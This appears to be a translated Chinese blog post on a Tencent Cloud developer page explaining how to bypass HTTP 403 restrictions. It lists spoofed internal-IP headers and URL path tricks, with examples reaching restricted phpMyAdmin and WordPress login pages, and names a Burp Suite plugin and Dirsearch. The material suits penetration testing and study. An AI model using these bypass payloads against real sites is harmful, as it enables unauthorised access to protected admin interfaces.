译-绕过 403
译-绕过 403
用户1423082
发布于 2024-12-31 20:18:59
发布于 2024-12-31 20:18:59
403-forbidden 一般是服务器配置不允许访问该目录或文件
一些技巧
HTTP 标头模糊测试
在某些情况下,可以通过更改请求的 Header 并包含内部地址来访问页面和私有文件,以下是一些示例;
X-ProxyUser-Ip: 127.0.0.1
Client-IP: 127.0.0.1
Host: localhost
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Real-IP: 127.0.0.1路径模糊测试
尝试对 url 进行一些更改,使用特殊字符或包括 HTML 编码,例如:
test.com/admin/*
test.com/*admin/
test.com/%2fadmin/
test.com%2fadmin%2f
test.com/./admin/
test.com//admin/./
test.com///admin///
test.com//admin//
test.com/ADMIN/
test.com/;/admin/
test.com//;//admin/绕过真实示例 1
下面是phpmyadmin 的绕过,限制了特定ip对/phpmyadmin/ 的访问,下面都不行
/phpmyadmin/*
/./phpmyadmin/
//phpmyadmin//
/*/phpmyadmin/下面3个斜杠就行
///phpmyadmin///绕过真实示例 2
这是使用 2 个斜杠访问wordpress的登录后台
工具
有人已经开发了攻击,帮助识别并绕过403
Burpsuite Professional的插件
查找具有 403 权限的可能目录,我们可以使用 Dirsearch 对目录和文件执行暴力破解。
原文
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2023-11-16,如有侵权请联系 [email protected] 删除
评论
登录后参与评论
推荐阅读
目录
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号